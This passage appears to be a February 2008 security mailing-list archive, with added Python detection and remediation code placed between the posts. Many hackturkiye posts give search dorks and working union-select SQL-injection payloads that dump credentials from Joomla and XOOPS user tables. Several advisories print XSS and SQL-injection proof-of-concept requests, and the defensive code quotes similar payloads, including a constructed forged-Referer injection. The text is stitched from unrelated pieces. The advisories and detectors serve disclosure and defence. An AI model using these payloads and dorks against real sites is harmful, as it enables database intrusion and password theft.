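    '10.0.0.5 - - [19/Feb/2008:10:00:01 +0000] "GET /wbb3/index.php?page=PMList'
    '&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC HTTP/1.1" 200 5120',
    '10.0.0.9 - - [19/Feb/2008:10:00:07 +0000] "GET /wbb3/index.php?page=PMList'
    '&folderID=0&pageNo=1&sortField=isViewed&sortOrder=ASC,(SELECT%20password%20FROM'
    '%20wcf1_user%20WHERE%20userID=1%20AND%20IF(ORD(SUBSTR(password,1,1))%3E55,'
    'BENCHMARK(300,MD5(23)),1)) HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

Response-time outliers on the same URL are the other signal for this class of query, and the scanner above does not cover them.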









SYMSA-2008-001: Lyris ListManager - Multiple Vulnerabilities

2008-02-19 Thread research
-BEGIN PGP SIGNED MESSAGE-

Hash: SHA1



Symantec Vulnerability Research   

http://www.symantec.com/research

Security Advisory

 

Advisory ID: SYMSA-2008-001

Advisory Title: Lyris ListManager - Multiple Vulnerabilities

Author: Tyler Shields [EMAIL PROTECTED]

Release Date: Wednesday, January 21, 2008

Application: Lyris List Manager

Platform: Web Interface

Severity: Remotely Exploitable

Vendor status: Vendor has corrected products and is ok with public release 

CVE Number: CVE-2007-6319

Reference: http://www.securityfocus.com/bid/26792

 

Overview:

"Lyris ListManager is the world's most popular software for creating,
sending, and tracking highly effective email campaigns, newsletters,
and discussion groups. From our new Template and Content Builder to
our Image Library and new HTML editor, ListManager is the smarter,
faster, easier way to manage all the aspects of your email marketing
program."

Details:

1. A user who is subscribed to any list on the ListManager system may
modify client side information sent to the server related to their
account, effectively elevating their privileges to list administrator.

2. A user who is subscribed to any list may gain access to arbitrary
mailing lists by modifying client side information sent to the server.
Accessing a preexisting mailing list on the ListManager system causes
the active user to be added as a member or administrator to that list.

3. Once administrative access is granted, a vulnerability in the
ListManager administrative interface allows an attacker
to create new accounts that collide with existing accounts. This
collision will result in overwriting data in the original account
with the data from the new account.

Vendor Response:

Vendor has acknowledged and corrected the issue in several versions
of the product.

Recommendation:

New versions of each major revision (8.95d, 9.2c and 9.3b), are available
at http://www.lyris.com/support/listmanager/archives.html. Affected
clients can download a new version and install it over the previous
installation.

Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues.  These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.

 


 

- ---Symantec Vulnerability Research Advisory Information---

 

For questions about this advisory, or to report an error:

[EMAIL PROTECTED]

 

For details on Symantec's Vulnerability Reporting Policy: 

http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

 

Symantec Vulnerability Research Advisory Archive: 

http://www.symantec.com/research/  

 

Symantec Vulnerability Research GPG Key:

http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

 

- -Symantec Product Advisory Information-

 

To Report a Security Vulnerability in a Symantec Product:

[EMAIL PROTECTED] 

 

For general information on Symantec's Product Vulnerability 

reporting and response:

http://www.symantec.com/security/

 

Symantec Product Advisory Archive: 

http://www.symantec.com/avcenter/security/SymantecAdvisories.html

 

Symantec Product Advisory PGP Key:

http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

 

- ---

 

Copyright (c) 2007 by Symantec Corp.

Permission to redistribute this alert electronically is granted 

as long as it is not edited in any way unless authorized by 

Symantec Consulting Services. Reprinting the whole or part of 

this alert in any medium other than electronically requires 

permission from [EMAIL PROTECTED]

 

Disclaimer

The information in the advisory is believed to be accurate at the 

time of publishing based on currently available information. Use 

of the information constitutes acceptance for use in an AS IS 

condition. There are no warranties with regard to this information. 

Neither the author nor the publisher accepts any liability for any 

direct, indirect, or consequential loss or damage arising from use 

of, or reliance on, this information.

 

Symantec, Symantec products, and Symantec Consulting Services are 

registered trademarks of Symantec Corp. and/or affiliated companies 

in the United States and other countries. All other registered and 

unregistered trademarks represented in this document are the sole 

property of their respective companies/owners.

-BEGIN PGP SIGNATURE-

Version: GnuPG v1.4.6 (GNU/Linux)


iD8DBQFHub+Cuk7IIFI45IARApcpAJ9x6KT4x2dvUerMthMOf6GtSh6WfwCgzuBV

NXgp2vbVovME0XaN1Lt2/xA=

=mDUZ

-END PGP SIGNATURE-



joomla SQL Injection(com_genealogy)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_genealogy)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_genealogy"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_genealogy&task=profile&id=-999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





[DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

2008-02-19 Thread Digital Security Research Group


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-016


Application:Jinzora Media Jukebox
Versions Affected:  2.7.5
Vendor URL: http://www.jinzora.com/
Bugs:   Multiple XSS Injections
Exploits:   YES
Reported:   04.02.2008
Second report:  12.02.2008
Vendor response:NONE
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Jinzora system has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS



Details
***

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL 
string.


1.1 Linked XSS vulnerabilities found in index.php.

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=


1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

Example:

http://[server]/[installdir]/ajax_request.php?language=


1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".

Example:

http://[server]/[installdir]/slim.php?jz_path=


1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters "frontend", "theme", "jz_path".

Example:

http://[server]/[installdir]/popup.php?theme=


1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/";>alert('DSecRG XSS')

-


2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter 
name "siteNewsData" 

Example:

siteNewsData = alert('DSecRG XSS')


2.2 Vulnerability found in script popup.php?ptype=playlistedit in post 
parameter name "query" 

Example:

query = alert('DSecRG XSS')





About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)


-- 

  Digital Security Research Group  mailto:[EMAIL PROTECTED]



joomla SQL Injection(com_listoffreeads)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_listoffreeads)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_listoffreeads"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 




PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure on Spyce - Python Server Pages (PSP)

2008-02-19 Thread ProCheckUp Research
PR08-01: Several XSS, a cross-domain redirect and a webroot disclosure 
on Spyce - Python Server Pages (PSP)


Vulnerability found: 19th December 2007

Vendor informed: 14th January 2007

Vulnerability fixed: the vendor did not respond, however a workaround 
has been included in the "Fix" section of this advisory.


Severity: Medium

Description:

All Spyce sample scripts that return client-supplied input back to the 
browser are vulnerable to XSS. It is also possible to redirect users to 
third-party sites and obtain the webroot path by not submitting required 
parameters to certain scripts.



Note: tested on Spyce - Python Server Pages version 2.1.3


The following are only some examples that demonstrate XSS:

http://domain.foo/docs/examples/redirect.spy?url=%3CSCRIPT%3Ealert('Can%20Cross%20Site%20Attack')%3C/SCRIPT%3E&type=internal
http://domain.foo/docs/examples/handlervalidate.spy?x=";>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/request.spy?name="/>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/getpost.spy?Name="/>alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/formtag.spy?="/>alert('Can%20Cross%20Site%20Attack')&foo=Submit!&mycheck=check1&mypass=secret&myradio=radio_option1&mytext=some&mytextarea=alert('Can%20Cross%20Site%20Attack')
http://domain.foo/spyce/examples/formtag.spy?mypass=%22/%3E%3Cscript%3Ealert(1)%3C/script%3E


Other vulnerable scripts and unsanitized parameters:

Script: /demos/chat/
parameter: newline

Script: /docs/examples/formintro.spy
parameter: text1

Script: /docs/examples/formtag.spy
parameter: mytext
parameter: mydate

Script: /docs/examples/redirect.spy
parameter: type


Note: some XSS can only be exploited via POST requests (as opposed to 
GET). This could be done by using an embedded HTML form with a 
"method='POST'" attribute and a JavaScript snippet that causes the form 
to auto-submit itself. Such a form would be located on a third-party site.



Cross-domain redirect PoC:

http://domain.foo/spyce/examples/redirect.spy?url=www.procheckup.com&type=external


Requesting the following URL returns the server's webroot:

http://domain.foo/spyce/examples/automaton.spy


Consequences:

An attacker may be able to cause execution of malicious scripting code 
in the browser of a user who clicks on a link to a Spyce-based site. 
Such code would run within the security context of the target domain. 
This type of attack can result in non-persistent defacement of the 
target site, or the redirection of confidential information (i.e.: 
session IDs) to unauthorised third parties.


Attackers can redirect victim users to third-party sites. Such behaviour 
can help attackers perform phishing attacks by redirecting the victim to 
a spoof login page.



Fix:

Remove sample scripts from live environments.


References:

http://www.procheckup.com/Vulnerabilities.php
http://spyce.sourceforge.net/


Credits: Richard Brain, Jan Fry, and Bruno Kovacs of ProCheckUp Ltd 
(www.procheckup.com)



Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the 
Internet community for the purpose of alerting them to problems, if and 
only if, the Bulletin is not edited or changed in any way, is attributed 
to Procheckup, and provided such reproduction and/or distribution is 
performed for non-commercial purposes.


Any other use of this information is prohibited. Procheckup is not 
liable for any misuse of this information by any third party.
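The cross-domain redirect PoC above (`redirect.spy?url=www.procheckup.com&type=external`) is the usual open-redirect shape: the script forwards the browser to whatever the `url` parameter carries. The following Python is an added example, not Spyce's code and not a reproduction of its sample script; it places the unsafe behaviour beside a validator that only accepts a relative path on the same site, and a second variant for deployments that need absolute URLs. It is exercised against the bypasses such fixes commonly miss: scheme-relative `//host`, a backslash after the slash, `javascript:` URLs, CR/LF for header injection, a trusted host used as a subdomain, and a trusted host used as the userinfo part. `TRUSTED_HOST` is an assumed configuration value.

```python
from urllib.parse import urlsplit, urlunsplit

TRUSTED_HOST = "domain.foo"   # assumed: the application's own host name


def unsafe_redirect_target(url):
    """The vulnerable shape: the parameter is trusted as given."""
    return url


def safe_redirect_target(url, default="/"):
    """Return url if it is a same-site relative path, otherwise default.

    Checks, in order: no control characters (CR/LF would let the value inject
    response headers), no backslash (browsers treat '\\' as '/', so '/\\evil'
    becomes scheme-relative), no leading '//' ('//evil' and '///evil' are
    host-relative), then, after parsing, no scheme and no authority, and a path
    that starts with exactly one '/'.
    """
    if not url or any(ord(c) < 0x20 for c in url):
        return default
    if "\\" in url or url.startswith("//"):
        return default
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        return default
    if not parts.path.startswith("/"):
        return default
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


def absolute_same_host(url, default="/"):
    """Variant for absolute URLs: only http(s) whose host is exactly TRUSTED_HOST.

    Comparing .hostname (not a substring match on the raw string) is what
    defeats 'http://domain.foo.evil/' and 'http://domain.foo@evil/'. Any
    userinfo is refused; the rebuilt URL drops a port, which is acceptable
    when the site is served on the default port only (an assumption here).
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return default
    if parts.hostname != TRUSTED_HOST or parts.username or parts.password:
        return default
    path = parts.path or "/"
    return urlunsplit((parts.scheme, parts.hostname, path, parts.query, parts.fragment))


if __name__ == "__main__":
    for candidate in ["/account", "www.procheckup.com", "//evil.example/x",
                      "/\\evil.example", "javascript:alert(1)",
                      "http://domain.foo.evil.example/", "http://domain.foo@evil.example/",
                      "https://domain.foo/spyce/examples/?a=1"]:
        print(repr(candidate), "->", safe_redirect_target(candidate),
              "|", absolute_same_host(candidate))
```

The fix the advisory recommends (removing sample scripts from production) is still the right first step; the validator is what a redirect endpoint that must stay in place should do with its parameter.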





joomla SQL Injection(com_facileforms)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_facileforms)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_facileforms"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module myTopics-print SQL Injection(articleid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#XOOPS Module myTopics-print SQL Injection(articleid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: "/modules/myTopics/"

# 

#  you can add the exploit after mytopics  

#



  example


  /modules/myTopics/ (exploit)   



EXPLOIT : 


print.php?articleid=-999/**/union/**/select+1,char(112,115,101,114),0,concat(uname,0x3a,pass),0,char(117,115,101,114,110,97,109,101,58),0,0,0,0,1,1,1,1,1,1,1,1,1,1,0,0,111,333,222,0,0,0,0/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%201%200%201%20




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module wflinks SQL Injection(cid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#XOOPS Module wflinks SQL Injection(cid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: modules/wflinks/viewcat.php

# 

#  DORK 2 : allinurl: modules/wflinks

#





  example


  http://xx.com/modules/wflinks/viewcat.php?cid= [exploit]


  EXPLOIT : 


-88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 









joomla SQL Injection(com_geoboerse)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_geoboerse)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_geoboerse"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_detail)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_detail)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_detail"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_detail&[EMAIL 
PROTECTED]&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A






# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_team)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_team)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_team"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*






# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





SmarterMail Enterprise 4.3 - malformed mail XSS

2008-02-19 Thread jplopezy


Product: SmarterMail Enterprise 4.3


Web product: 


http://www.smartertools.com/Products/SmarterMail/Overview.aspx


Web product demo:


http://maildemo.smartertools.com/Login.aspx



Apparently this webmail is vulnerable to a very dangerous XSS attack, because 
it runs automatically when you open the inbox. 

The vulnerability is triggered by a malformed mail: the procedure is to add a line 
of code in the subject, and this causes the execution of XSS in your inbox. 


Simply add the following line of code in the subject of the mail to execute it: 


The line of code is stored in a text file as a precaution; just copy and 
paste it into the subject of the mail to test the concept:


http://es.geocities.com/jplopezy/SmarterMailXSS.txt



I hope that will be useful greetings!



Juan Pablo Lopez Yacubian

fuzzertina.blogspot.com






joomla SQL Injection(com_formtool)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_formtool)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_formtool"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_formtool&task=view&formid=2&catid=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





joomla SQL Injection(com_iigcatalog)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   joomla SQL Injection(com_iigcatalog)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl :"com_iigcatalog"

# 

#  DORK 2 : allinurl: 

#



   EXPLOIT : 


index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/*




# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 





XOOPS Module section SQL Injection(articleid)

2008-02-19 Thread hackturkiye . hackturkiye
###

# 

#   XOOPS Module section SQL Injection(articleid)

#

###

#

# AUTHOR : [EMAIL PROTECTED] 

#

# HOME 1 : http://www.milw0rm.com/author/1334

#   

# MAİL : [EMAIL PROTECTED]

#



# 

#  DORK 1 : allinurl: modules/wfsection/print.php?articleid=

# 



   EXPLOIT : 


-999+union/**/select/**/char(117,115,101,114,110,97,109,101,58),1,2,concat(uname,0x3a,pass),0,0,0,0,0,0,1,1,1,1,0,char(117,115,101,114,110,97,109,101,58),0,0,0,1,2,2,0,0,0,2,2,2+from/**/xoops_users/*%20where%20pass%20admin%20





# [EMAIL PROTECTED]   i AM NOT HACKER  [EMAIL PROTECTED] 
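The hackturkiye posts above (the Joomla com_genealogy, com_listoffreeads, com_facileforms, com_geoboerse, com_detail, com_team, com_formtool and com_iigcatalog items, and the XOOPS myTopics, wflinks and wfsection items) all share one shape: a negative id so the original query returns no rows, `/**/` in place of spaces, `union select` with numeric fillers to match the column count, and `concat(username,0x3a,password)` or `char(...)` to pull credentials out of `jos_users`, `mos_users` or `xoops_users`. The following Python is an added example and not the posters' code: a detection routine that normalises a request URL the way a rule has to before matching (repeated URL decoding for double encoding, MySQL versioned `/*! ... */` comments unwrapped, ordinary inline comments turned into whitespace, case and whitespace collapsed), and a scan of a few constructed access-log lines. The log lines, IPs and byte counts are made up for the example; the payloads in them follow the shape of the posts.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic): one benign request, one /**/ payload,
# one mixed URL-encoded payload, one double-encoded payload, and a second benign request.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Feb/2008:10:01:02 +0000] "GET /index.php?option=com_genealogy&task=profile&id=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [19/Feb/2008:10:01:07 +0000] "GET /index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/* HTTP/1.1" 200 812',
    '10.0.0.9 - - [19/Feb/2008:10:01:09 +0000] "GET /modules/wflinks/viewcat.php?cid=-88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114),concat(uname,0x3a,pass)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fxoops_users/* HTTP/1.1" 200 640',
    '10.0.0.9 - - [19/Feb/2008:10:01:11 +0000] "GET /index.php?option=com_team&gid=-1%252F%252A%252A%252Funion%252F%252A%252A%252Fselect%252F%252A%252A%252F1,password,username%252F%252A%252A%252Ffrom%252F%252A%252A%252Fjos_users HTTP/1.1" 200 777',
    '10.0.0.7 - - [19/Feb/2008:10:01:15 +0000] "GET /index.php?option=com_content&task=view&id=42&Itemid=1 HTTP/1.1" 200 9001',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
UNION_RE = re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b")
# Markers of a credential pull as used in the posts: concat()/char() builders, the 0x3a
# separator, or the stock Joomla/Mambo/XOOPS user tables.
CRED_RE = re.compile(r"\b(?:concat\s*\(|char\s*\(|0x3a\b|(?:jos|mos|xoops)_users\b)")


def normalize(url, max_rounds=3):
    """Undo the obfuscation seen in the posted payloads so a pattern match is reliable."""
    s = url
    for _ in range(max_rounds):          # repeated decoding defeats %25-style double encoding
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    s = s.replace("+", " ")
    # MySQL executes the body of /*! ... */, so keep the body and only drop the delimiters.
    s = re.sub(r"/\*!\d*\s*(.*?)\*/", r" \1 ", s)
    # Ordinary inline comments are token separators for MySQL; treat them as whitespace.
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(url):
    """Return a verdict string for a request URL, or None if nothing matched."""
    n = normalize(url)
    if UNION_RE.search(n):
        return "union_sqli_credential_dump" if CRED_RE.search(n) else "union_sqli"
    return None


def scan(lines):
    """Run classify() over combined-format log lines; returns (client_ip, verdict, normalized_url)."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify(m.group(1))
        if verdict:
            hits.append((line.split()[0], verdict, normalize(m.group(1))))
    return hits


if __name__ == "__main__":
    for ip, verdict, url in scan(SAMPLE_LOG):
        print(ip, verdict, url)
```

Matching on the normalised form rather than the raw request line is the point: the raw payloads in the posts contain neither the word `union` followed by a space nor a literal `select` in several cases, so a naive `union select` signature misses them.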








[DSECRG-08-015] Multiple Security Vulnerabilities in Dokeos 1.8.4

2008-02-19 Thread Digital Security Research Group

Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-015


Application:Dokeos E-Learning System
Versions Affected:  1.8.4
Vendor URL: http://dokeos.com
Bugs:   Multiple SQL Injections,Multiple Blind SQL 
Injections,Multiple  XSS, etc.
Exploits:   YES
Reported:   25.01.2008
Vendor response:28.01.2008
Patch released: 12.02.2008
Date of Public Advisory:19.02.2008
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)



Description
***

Dokeos E-Learning System has multiple security vulnerabilities:

1. Multiple SQL Injections
2. Multiple Blind Sql Injections
3. Multiple Stored XSS
4. Multiple Linked XSS
5. Image XSS

Details
***


1. Multiple SQL Injections

1.1  Attacker can inject SQL code in module /whoisonline.php, vulnerable 
parameter id 
     Attacker must have valid user credentials 
 

Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*


1.2  Attacker can inject SQL code in module main/mySpace/index.php vulnerable 
parameter tracking_list_coaches_column





Example:

http://[server]/[installdir]/main/mySpace/index.php?tracking_list_coaches_direction=ASC&tracking_list_coaches_page_nr=1&tracking_list_coaches_per_page=20&view=admin
&tracking_list_coaches_column=0';

1.3  Attacker can inject SQL code in module 
/dokeos/main/create_course/add_course.php POST Parameter tutor_name


Example:

POST /dokeos/main/create_course/add_course.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Content-Length: 107
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/dokeos/main/create_course/add_course.php

title=1234&category_code=PROJ&wanted_code=1234&course_language=slovenian&_qf__add_course=&
tutor_name='



-


2.  Multiple Blind SQL Injections

2.1 Vulnerability found in script index.php in header parameter  "Referer"


Example:

GET /dokeos/index.php HTTP/1.0
Cookie: dk_sid=av68g9lus300ts870iqebhneh5
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Referer: '

2.2 Vulnerability found in script /main/admin/class_list.php? in header 
parameter  "X-Forwarded-For"



-




3. Stored  XSS vulnerability found in /main/auth/inscription.php attacker can 
inject XSS in POST  parameter username 


-

4. Multiple linked XSS


4.1 Linked XSS vulnerability found in dokeos/main/calendar/myagenda.php 
attacker can inject XSS in parameter courseCode 


Example:

http://[server]/[installdir]/main/calendar/myagenda.php?courseCode=";>alert('DSecRG
 XSS')



4.2 Linked XSS vulnerability found in main/admin/course_category.php attacker 
can inject XSS in parameter category

Example:

http://[server]/[installdir]/dokeos/main/admin/course_category.php?category=alert('DSecRG
 XSS') HTTP/1.0



4.3 Linked XSS vulnerability found in /dokeos/main/admin/session_list.php 
attacker can inject XSS in parameter cmessage 


Example:

http://[server]/[installdir]/dokeos/main/admin/session_list.php?action=show_message&message=>%22%27>

-


5. Image XSS vulnerability in page main/auth/profile.php   attacker can upload 
avatar picture with XSS code:


Example:

More info: http://www.dsec.ru/about/articles/web_xss/ (in Russian)

-

Fix Information
***

Vendor fixed this flaw on 12.02.2008. The patch for version 1.8.4 can be downloaded 
here:

http://www.dokeos.com/wiki/index.php/Security#Dokeos_1.8.4_SP2_download



About
*

Digital Security is a leading IT security company in Russia, providing 
information security consulting, audit and penetration testing services, risk 
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and 
PCI DSS standards. Digital Security Research Group focuses on web application 
and database security problems with vulnerability reports, advisories and 
whitepapers posted regularly on our website.


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)





  Digital Security Research Groupmailto:[EMAIL PROTECTED]
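The Referer and X-Forwarded-For items in section 2 of the advisory above inject through request headers, which a tracking or "who is online" feature typically writes to a table on every hit. The following Python is an added example, not Dokeos code; the `track_hits` table and its columns are constructed for the example and say nothing about the real schema. It reproduces the pattern against an in-memory SQLite database: the string-built INSERT fails on the advisory's single-quote probe and can be steered by a crafted Referer into recording a row with a client address that was never used, while the parameterised version stores the same header values verbatim. Request headers are attacker-controlled input in exactly the way GET and POST parameters are.

```python
import sqlite3

# The advisory's probe: a lone quote in the Referer header.
PROBE_HEADERS = {"Referer": "'"}

# Constructed payload: closes the attacker's own row and appends a second one with a
# forged client address, all inside a single INSERT (no stacked queries needed).
FORGED_HEADERS = {
    "X-Forwarded-For": "10.0.0.1",
    "Referer": "x', 'Mozilla'), ('127.0.0.1', 'forged",
    "User-Agent": "Mozilla",
}


def setup():
    """Fresh in-memory database with the (hypothetical) hit-tracking table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE track_hits (id INTEGER PRIMARY KEY, ip TEXT, referer TEXT, ua TEXT)")
    return db


def header_values(headers):
    return (headers.get("X-Forwarded-For", "0.0.0.0"),
            headers.get("Referer", ""),
            headers.get("User-Agent", ""))


def log_hit_vulnerable(db, headers):
    """Concatenates header values straight into the statement (the flawed pattern)."""
    sql = "INSERT INTO track_hits (ip, referer, ua) VALUES ('%s', '%s', '%s')" % header_values(headers)
    db.execute(sql)
    db.commit()


def log_hit_safe(db, headers):
    """Same insert with bound parameters: header bytes never become SQL syntax."""
    db.execute("INSERT INTO track_hits (ip, referer, ua) VALUES (?, ?, ?)", header_values(headers))
    db.commit()


def demo(headers, logger):
    """Run one logger against a fresh table; returns ('error', exception class name)
    or ('ok', [(ip, referer), ...] in insertion order)."""
    db = setup()
    try:
        logger(db, headers)
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)
    rows = db.execute("SELECT ip, referer FROM track_hits ORDER BY id").fetchall()
    return ("ok", rows)


if __name__ == "__main__":
    for name, headers in (("probe", PROBE_HEADERS), ("forged", FORGED_HEADERS)):
        print(name, "vulnerable:", demo(headers, log_hit_vulnerable))
        print(name, "safe:      ", demo(headers, log_hit_safe))
```

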